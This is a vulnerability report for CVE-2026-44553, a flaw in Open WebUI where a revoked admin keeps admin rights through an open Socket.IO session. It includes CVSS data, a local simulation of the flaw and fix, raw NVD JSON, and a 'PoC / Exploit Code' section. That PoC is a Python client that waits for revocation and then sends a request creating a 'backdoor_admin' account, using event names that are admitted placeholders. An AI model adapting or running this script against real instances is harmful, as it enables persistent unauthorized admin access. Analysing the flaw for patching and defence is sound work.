Security Vulnerability Report
CVE-2026-44553 CVSS 8.1 HIGH

Published: 2026-05-15 20:16:47
Last Modified: 2026-05-15 21:16:36

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, administrative role changes and user deletions do not iterate SESSION_POOL to disconnect affected sessions. As a result, a user whose admin role has been revoked retains admin privileges within their existing Socket.IO session for as long as they keep the connection alive (via automatic heartbeats). The gap is exclusive to the Socket.IO session cache. This vulnerability is fixed in 0.9.0.
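The mechanism described above (a per-connection cache populated on connect and, before the fix, never swept when a role changes or a user is deleted) as an added, runnable illustration. This is not Open WebUI's code: the store layout, the shape of SESSION_POOL and every function name here are assumptions modelled on the advisory text, and the `disconnect` callback stands in for the server-side Socket.IO disconnect call.

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Callable

# Added illustration of the CVE-2026-44553 flaw; this is NOT Open WebUI's code.
# The store layout, the SESSION_POOL shape and every function name here are
# assumptions modelled on the advisory text (a per-connection cache that is
# populated on connect and, before the fix, never iterated on role change).


@dataclass
class User:
    id: str
    role: str  # "admin" or "user"


# Authoritative user store: stands in for the database.
USERS: dict[str, User] = {}

# Socket.IO session cache: sid -> snapshot of the user taken when it joined.
# One user can hold several sids (several tabs or devices).
SESSION_POOL: dict[str, dict] = {}


def user_join(sid: str, user_id: str) -> None:
    """Connect handler: cache the user's identity and role for this socket."""
    SESSION_POOL[sid] = {"id": user_id, "role": USERS[user_id].role}


def socket_is_admin(sid: str) -> bool:
    """What a privileged socket handler consults: the cached snapshot only."""
    return SESSION_POOL.get(sid, {}).get("role") == "admin"


def update_role_vulnerable(user_id: str, new_role: str) -> None:
    """Pre-0.9.0 behaviour: the database is updated, live sockets are untouched."""
    USERS[user_id].role = new_role


def evict_user_sessions(user_id: str, disconnect: Callable[[str], None]) -> list[str]:
    """Iterate SESSION_POOL, drop every entry for user_id and close its socket."""
    evicted = [sid for sid, sess in SESSION_POOL.items() if sess["id"] == user_id]
    for sid in evicted:
        del SESSION_POOL[sid]
        disconnect(sid)
    return evicted


def update_role_fixed(user_id: str, new_role: str, disconnect: Callable[[str], None]) -> list[str]:
    """Fixed behaviour: persist the change, then force a fresh login on every socket."""
    USERS[user_id].role = new_role
    return evict_user_sessions(user_id, disconnect)


def delete_user_fixed(user_id: str, disconnect: Callable[[str], None]) -> list[str]:
    """Deletion needs the same sweep, otherwise a deleted user keeps a live socket."""
    del USERS[user_id]
    return evict_user_sessions(user_id, disconnect)


def demote_scenario(fixed: bool) -> dict:
    """Admin 'alice' connects from two tabs, then is demoted to 'user'."""
    USERS.clear()
    SESSION_POOL.clear()
    USERS["alice"] = User("alice", "admin")
    user_join("sid-1", "alice")
    user_join("sid-2", "alice")
    disconnected: list[str] = []
    if fixed:
        update_role_fixed("alice", "user", disconnected.append)
    else:
        update_role_vulnerable("alice", "user")
    return {
        "db_role": USERS["alice"].role,
        "socket_still_admin": socket_is_admin("sid-1"),
        "live_sids": sorted(SESSION_POOL),
        "disconnected": sorted(disconnected),
    }


def delete_scenario() -> dict:
    """Deleted user 'bob' must lose his socket as well."""
    USERS.clear()
    SESSION_POOL.clear()
    USERS["bob"] = User("bob", "user")
    user_join("sid-9", "bob")
    disconnected: list[str] = []
    delete_user_fixed("bob", disconnected.append)
    return {"live_sids": sorted(SESSION_POOL), "disconnected": disconnected}


if __name__ == "__main__":
    print("vulnerable:", demote_scenario(fixed=False))
    print("fixed:     ", demote_scenario(fixed=True))
    print("delete:    ", delete_scenario())
```

In the vulnerable path the database already says `user` while `socket_is_admin("sid-1")` still answers `True`, which is exactly the window the advisory describes; the fixed path empties the pool and disconnects both sids, so the next connection has to re-authenticate with the now-demoted account. As a defence-in-depth suggestion of my own (not something the advisory prescribes), privileged socket handlers can additionally re-read the role from the database instead of trusting the cached snapshot.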

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Weakness
CWE-613 (Insufficient Session Expiration)

Note: PR:L reflects that the attacker is an authenticated (formerly admin) user who only has to keep an already-open Socket.IO connection alive; no interaction from anyone else is needed (UI:N).

Configurations (Affected Products)

No CPE configuration data is present in the NVD record yet (status: Received). Affected range taken from the description:

Open WebUI < 0.9.0 (fixed in 0.9.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import time

import socketio  # python-socketio client: pip install "python-socketio[client]"

# Conceptual Proof of Concept for CVE-2026-44553
# This script demonstrates maintaining admin privileges via a persistent Socket.IO session.
# The event names ('auth', 'create_user') and payload shapes are placeholders chosen by the
# PoC author, not confirmed Open WebUI Socket.IO handlers; adapt them to the target.


class ExploitClient:
    def __init__(self, target_url):
        # The client answers the server's pings automatically; those heartbeats are what
        # keep the stale SESSION_POOL entry alive after the role has been revoked.
        self.sio = socketio.Client()
        self.target_url = target_url
        self.setup_handlers()

    def setup_handlers(self):
        @self.sio.event
        def connect():
            print("[+] Connected to Open WebUI Socket.IO server")

        @self.sio.event
        def disconnect():
            print("[-] Disconnected from server")

    def login(self, token):
        """Authenticate with a valid admin token"""
        print(f"[*] Attempting authentication with token: {token}")
        # Emit authentication event (placeholder event name)
        self.sio.emit('auth', {'token': token})

    def maintain_session_and_exploit(self):
        """Simulate keeping the connection alive and exploiting after revocation"""
        try:
            self.sio.connect(self.target_url)

            # 1. Authenticate as Admin
            self.login('VALID_ADMIN_TOKEN_HERE')
            print("[*] Session established. Waiting for admin to revoke role in UI...")
            print("[*] Keeping connection alive via heartbeats...")

            # Simulate waiting time while admin revokes access in the web interface.
            # The vulnerability is that the socket connection remains valid.
            time.sleep(60)

            # 2. Attempt privileged action despite revocation
            print("[*] Attempting to create a new user (Admin action)...")
            # This payload would succeed because SESSION_POOL was not cleared
            # (placeholder event and payload; see note above)
            malicious_payload = {
                'username': 'backdoor_admin',
                'password': 'password123',
                'role': 'admin'
            }
            self.sio.emit('create_user', malicious_payload)
            print("[+] Privileged action sent via revoked session.")
        except Exception as e:
            print(f"[!] Error: {e}")
        finally:
            self.sio.disconnect()


if __name__ == "__main__":
    target = "http://target-open-webui-instance:3000"
    exploit = ExploitClient(target)
    exploit.maintain_session_and_exploit()
```

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65 (GitHub Security Advisory GHSA-45m8-cpm2-3v65; cited under both reference sources in the NVD record below)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44553",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T20:16:46.707",
    "lastModified": "2026-05-15T21:16:35.810",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, administrative role changes and user deletions do not iterate SESSION_POOL to disconnect affected sessions. As a result, a user whose admin role has been revoked retains admin privileges within their existing Socket.IO session for as long as they keep the connection alive (via automatic heartbeats). The gap is exclusive to the Socket.IO session cache. This vulnerability is fixed in 0.9.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-613"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```